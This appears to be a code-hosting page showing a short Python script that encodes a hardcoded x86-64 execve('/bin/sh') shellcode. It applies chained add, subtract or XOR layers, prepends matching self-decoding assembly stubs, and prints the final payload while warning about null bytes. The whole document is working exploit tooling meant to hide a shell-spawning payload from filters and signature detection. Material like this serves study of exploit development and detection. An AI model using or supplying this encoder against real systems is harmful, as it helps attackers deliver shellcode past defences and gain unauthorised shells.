You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

59 lines
1.7KB

  1. #!/usr/bin/env python3
  2. import sys
  3. from binascii import hexlify
  4. # execve /bin/sh
  5. SC = b"\x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05"
  6. ADD_DECODER = b"\xeb\x12\x5e\x48\x31\xc9\xb1%SC_LEN%\x80\x6c\x0e\xff%VAL%\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xe9\xff\xff\xff"
  7. SUB_DECODER = b"\xeb\x12\x5e\x48\x31\xc9\xb1%SC_LEN%\x80\x44\x0e\xff%VAL%\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xe9\xff\xff\xff"
  8. XOR_DECODER = b"\xeb\x12\x5e\x48\x31\xc9\xb1%SC_LEN%\x80\x74\x0e\xff%VAL%\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xe9\xff\xff\xff"
  9. def encode(sc, action, value):
  10. new_sc = []
  11. if action == 'add':
  12. decoder = ADD_DECODER
  13. elif action == 'sub':
  14. decoder = SUB_DECODER
  15. elif action == 'xor':
  16. decoder = XOR_DECODER
  17. for byte in sc:
  18. if action == 'add':
  19. new_sc += [(byte+value) % 256]
  20. elif action == 'sub':
  21. new_sc += [(byte-value) % 256]
  22. elif action == 'xor':
  23. new_sc += [(byte^value) % 256]
  24. new_sc = bytes(new_sc)
  25. decoder = decoder.replace(b"%SC_LEN%", bytes([len(new_sc)]))
  26. decoder = decoder.replace(b"%VAL%", bytes([value]))
  27. return decoder + new_sc
  28. def main():
  29. rnd = []
  30. for i in range(0, len(sys.argv[1:]), 2):
  31. rnd += [(sys.argv[i+1], int(sys.argv[i+2]))]
  32. print(f"[*] Raw shellcode length: {len(SC)}")
  33. encoded = SC
  34. for i in rnd:
  35. encoded = encode(encoded, i[0], i[1])
  36. if b'\x00' in encoded:
  37. print("[!] Warning: null byte found in encoded shellcode!")
  38. print(f"[*] Final encoded shellcode + decoder length: {len(encoded)}")
  39. print("[+] Shellcode: ")
  40. print( "\\x" + str(b"\\x".join(hexlify(bytes([x])) for x in encoded), 'utf-8') )
  41. if __name__=='__main__':
  42. main()